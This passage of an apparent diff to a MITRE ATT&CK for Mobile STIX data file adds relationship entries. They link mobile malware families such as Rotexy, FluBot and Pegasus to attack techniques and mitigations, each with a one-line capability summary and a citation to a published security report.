"relationship--dcae3b7c-27d2-4377-9dc6-59dae15ac962", + "created": "2019-09-23T13:36:08.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:58:03.072Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can lock an HTML page in the foreground, requiring the user enter credit card information that matches information previously intercepted in SMS messages, such as the last 4 digits of a credit card number. If attempts to revoke administrator permissions are detected, [Rotexy](https://attack.mitre.org/software/S0411) periodically switches off the phone screen to inhibit permission removal.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6f27a13d-b353-47f3-8a71-a13e8c4c3d60", + "type": "relationship", + "created": "2020-09-11T14:54:16.585Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "modified": "2021-04-19T17:11:50.418Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect attacker-specified files, including files located on external storage.(Citation: Lookout Desert Scorpion)\t", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--88e33687-e999-42c8-b46b-49d2adfa17d0", + "created": "2022-04-01T15:02:04.528Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Apple regularly provides security updates for known OS vulnerabilities. ", + "modified": "2022-04-01T15:02:04.528Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--de45db46-2251-4a29-b4d7-3fcf679e9484", + "created": "2019-09-04T15:38:56.877Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + }, + { + "source_name": "FlexiSpy-Features", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. 
Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:16.401Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can intercept SMS and MMS messages as well as monitor messages for keywords.(Citation: CyberMerchants-FlexiSpy)(Citation: FlexiSpy-Features)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a563fc97-a452-4348-a831-f4fb55c71e35", + "created": "2023-03-03T16:22:45.712Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:22:45.712Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has used fake Verisign and Symantec certificates to bypass malware detection systems. 
[YiSpecter](https://attack.mitre.org/software/S0311) has also signed malicious apps with iOS enterprise certificates to work on non-jailbroken iOS devices.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5b04c8d0-c026-4838-9383-e4146de36d4d", + "created": "2023-03-16T18:33:19.941Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:33:19.941Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0fe69e0-d08f-488d-b1cf-3f0dbb28accc", + "created": "2023-02-28T20:37:01.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:13:55.642Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use `locale.getLanguage()` to choose the language for notifications and avoid user detection.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2bbd620d-6deb-4f81-a95b-98a7a74878e9", + "created": "2023-03-20T18:51:07.547Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:07.547Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5482462c-08bc-4e28-bc20-bfbbc60f3f81", + "created": "2022-04-05T20:03:46.789Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:03:46.789Z", + 
"relationship_type": "revoked-by", + "source_ref": "attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9e95ef68-0650-49eb-888f-47c211481be9", + "created": "2023-03-20T18:51:40.217Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:40.217Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ece70dca-803c-4209-8792-7e56e9901288", + "created": "2020-07-15T20:20:59.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. 
Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:38:15.470Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can delete all data from an infected device.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--dfe6d454-1a24-4c42-97eb-4ddfd1dbb09b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. 
Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.144Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) has the capability to exploit several known vulnerabilities and escalate privileges.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cde60121-3d7c-47c8-abeb-582854425599", + "type": "relationship", + "created": "2020-07-20T13:27:33.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-08-10T21:57:54.531Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can update the running malware.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e723d78f-b6c3-4ba5-8946-b44e651834e3", + "created": "2023-03-16T13:32:02.290Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:32:02.290Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--13518e48-bb32-4ee3-9cd0-e5f367a2fb2d", + "created": "2019-10-18T14:50:57.491Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates often contain patches for vulnerabilities.", + "modified": "2022-03-30T15:52:58.256Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a32db277-593f-4fd1-bdcb-9f677b1a05e1", + "type": "relationship", + "created": "2020-06-26T14:55:13.289Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.289Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can abuse Android’s accessibility service to capture data from installed applications.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10c07066-df05-4dff-bb95-c76be02ea4ef", + "created": "2020-09-14T14:13:45.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. 
Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:30:00.975Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) imposes geo-restrictions when delivering the second stage.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8570b7ef-a84d-480e-b1ca-b15f15d12103", + "created": "2019-09-23T13:36:08.341Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:58:27.974Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can communicate with the command and control server using JSON payloads sent in HTTP POST request bodies. 
It can also communicate by using JSON messages sent through Google Cloud Messaging.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f2d05b16-3565-453e-9fbb-1c02146e17e1", + "created": "2020-06-26T15:32:25.002Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can record keystrokes.(Citation: Threat Fabric Cerberus)", + "modified": "2022-04-15T17:33:17.868Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4", + "type": "relationship", + "created": "2019-09-03T19:45:48.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-09-11T13:25:19.117Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can obtain a list of installed applications.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b7652f27-1cf6-4310-bf6b-5fb99c4fd725", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) has the ability to record audio.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1b633efc-762f-47f9-96c3-d08ba92e0e3e", + "created": "2022-04-01T17:05:56.046Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "On Android 11 and up, users are not prompted with the option to select “Allow all the time” and must navigate to the settings page to manually select this 
option. On iOS 14 and up, users can select whether to provide Precise Location for each installed application. ", + "modified": "2022-04-01T17:05:56.046Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--faff9f9c-9064-4b3a-bdf9-bbeced2447a6", + "created": "2020-09-11T16:22:03.266Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:33:34.466Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect SMS messages.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7bf2e05e-496f-49d1-8a37-48cc3ff8d6cc", + "created": "2020-04-08T15:41:19.400Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cofense Anubis", + "description": "M. Feller. 
(2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020.", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:17:41.320Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can modify administrator settings and disable Play Protect.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ca486783-9413-4f39-8d2f-3adcb3e79127", + "type": "relationship", + "created": "2020-12-24T21:55:56.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.657Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used an AES encrypted file in the assets folder with an unsuspecting name (e.g. 
‘GoogleMusic.png’) for holding configuration and C2 information.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--56758bb5-230e-43ac-9851-167c296c3dfa", + "created": "2023-03-20T18:38:27.730Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:38:27.730Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2621a020-8d4f-4ca4-b874-0be336a8cafd", + "type": "relationship", + "created": "2020-04-08T18:55:29.196Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. 
Retrieved April 8, 2020.", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "source_name": "Cofense Anubis" + } + ], + "modified": "2020-04-09T16:45:38.751Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) exfiltrates data encrypted (with RC4) by its ransomware module.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7ef9f4cf-863b-4bc4-bdaf-55055263c030", + "created": "2022-03-30T20:42:04.251Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised to be extra scrutinous of applications that request location, and to deny any permissions requests for applications they do not recognize.", + "modified": "2022-03-30T20:42:04.251Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 